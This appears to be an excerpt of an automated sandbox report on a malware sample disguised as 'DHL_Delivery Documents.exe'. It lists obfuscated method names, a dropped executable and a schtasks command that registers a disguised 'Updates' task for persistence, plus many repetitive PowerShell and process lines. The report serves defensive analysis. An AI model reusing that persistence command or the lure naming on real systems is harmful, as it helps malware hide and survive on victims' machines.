            Source: 0.2.DHL_Delivery Documents.exe.4351058.2.raw.unpack, RxkmdA69PTFuhRfPXeX.csHigh entropy of concatenated method names: 'advPjKSrex', 'rMjPZggM78', 'S44P1MHTsT', 'PHgPMxuFOG', 'gMuPvhfsml', 'PpvPbMTrbr', 'iPpPRsOkn5', 'aJcPmnS6fN', 'QGuPTVCRdG', 'aXEPuqKoqQ'
            Source: 0.2.DHL_Delivery Documents.exe.4351058.2.raw.unpack, SFlTW26StfpklInMEh0.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'I0IcyJY6Ol', 'UYockUYD0t', 'mLqcgC0MOU', 'v9bcfr0uEg', 'TiDcJsOY82', 'cCrc3r9rd6', 'TPdcFcSJBA'
            Source: 0.2.DHL_Delivery Documents.exe.4351058.2.raw.unpack, jO3Tf3X7vkYNwGYAPE.csHigh entropy of concatenated method names: 'JAkGQku8Ku', 'ziQG8v403L', 'xIFGN8UfhC', 'oRTG2qlitJ', 'PCSGWWGWji', 'GNqG06W3Z5', 'wSyGUXfwEe', 'eQyGpA1q1o', 'iVZGOsKRtL', 'ABhGYtx0oH'
            Source: 0.2.DHL_Delivery Documents.exe.4351058.2.raw.unpack, yjA8AJ8FAEvC4Ibgo1.csHigh entropy of concatenated method names: 'Dispose', 'nS16ts6l5t', 'TT8qeruNSO', 'AcWOOMTBrN', 'Y0O6V3Tf37', 'AkY6zNwGYA', 'ProcessDialogKey', 'sEZq97GEca', 'jvLq6ObKcN', 'LxSqqwEk4C'
            Source: 0.2.DHL_Delivery Documents.exe.4351058.2.raw.unpack, XPVT9YwdK4GfnPIrg7.csHigh entropy of concatenated method names: 'hQAWL0kvSP', 'Sd3W8CUqC3', 'AgHW2kw0x0', 'j91W0EoWPk', 'sGSWU3yF1k', 'Wrj2Je1Ftb', 'eqP23FW5Iq', 'tAo2F34GXa', 'aF32XtoCmC', 'Ewu2trLGwg'
            Source: 0.2.DHL_Delivery Documents.exe.4351058.2.raw.unpack, z7GEcat0vLObKcNnxS.csHigh entropy of concatenated method names: 'DCeGwQMc53', 'cpRGeTu8Wm', 'SdPG5lvP1I', 'QOdGrNYvbY', 'r28GylScLZ', 'feiGBmaYKf', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 0.2.DHL_Delivery Documents.exe.4351058.2.raw.unpack, W3yVFhmE2W66Gxi81U.csHigh entropy of concatenated method names: 'ch88ysMWLB', 'TAf8kbr2EC', 'lJr8geZMUs', 'NjP8fPEvxf', 'ecS8JXBuDi', 'eRu830v3hJ', 'KOO8FquaWt', 'mgv8XG0Pqe', 'lC98tCWWRV', 'kP18VxtKk5'
            Source: 0.2.DHL_Delivery Documents.exe.4351058.2.raw.unpack, AlPV4878XS9e8K3aHI.csHigh entropy of concatenated method names: 'Km90Q3RKa5', 'IwD0NYQhwE', 'isX0Wc5hG9', 'jcNWVEPMED', 'XuFWzk15Vj', 'QQi093tlPI', 'XMU06AoWnM', 'rF50qFXpSy', 'Pfl0SjbFuk', 'CA20lcbKcs'
            Source: 0.2.DHL_Delivery Documents.exe.4351058.2.raw.unpack, nCnGfHzpr4cbYfCxmv.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Nx6PxtEyZU', 'a0OPdQN0Hq', 'Fj9PHm81if', 'Jy2PCsej4w', 'Ad0PGhjdTf', 'E5RPP2Sggj', 'i6ZPcrbrd5'
            Source: 0.2.DHL_Delivery Documents.exe.4351058.2.raw.unpack, A2h86JlramnZ7u93tE.csHigh entropy of concatenated method names: 'OyF603yVFh', 'N2W6U66Gxi', 'ipo6OKiyGm', 'YNY6Ymx6ld', 'gHO6d3ytPV', 'E9Y6HdK4Gf', 'v4Ru7jR2ePxAFprqWn', 'FdSQy9Tn1oP85Qapxr', 'nBC66U8qXp', 'm8J6SaRd08'
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeFile created: C:\Users\user\AppData\Roaming\YybGLWQSx.exeJump to dropped file

            Boot Survival

            barindex
            Uses schtasks.exe or at.exe to add and modify task schedules
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YybGLWQSx" /XML "C:\Users\user\AppData\Local\Temp\tmp3106.tmp"

            Hooking and other Techniques for Hiding and Protection

            barindex
            Loading BitLocker PowerShell Module
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
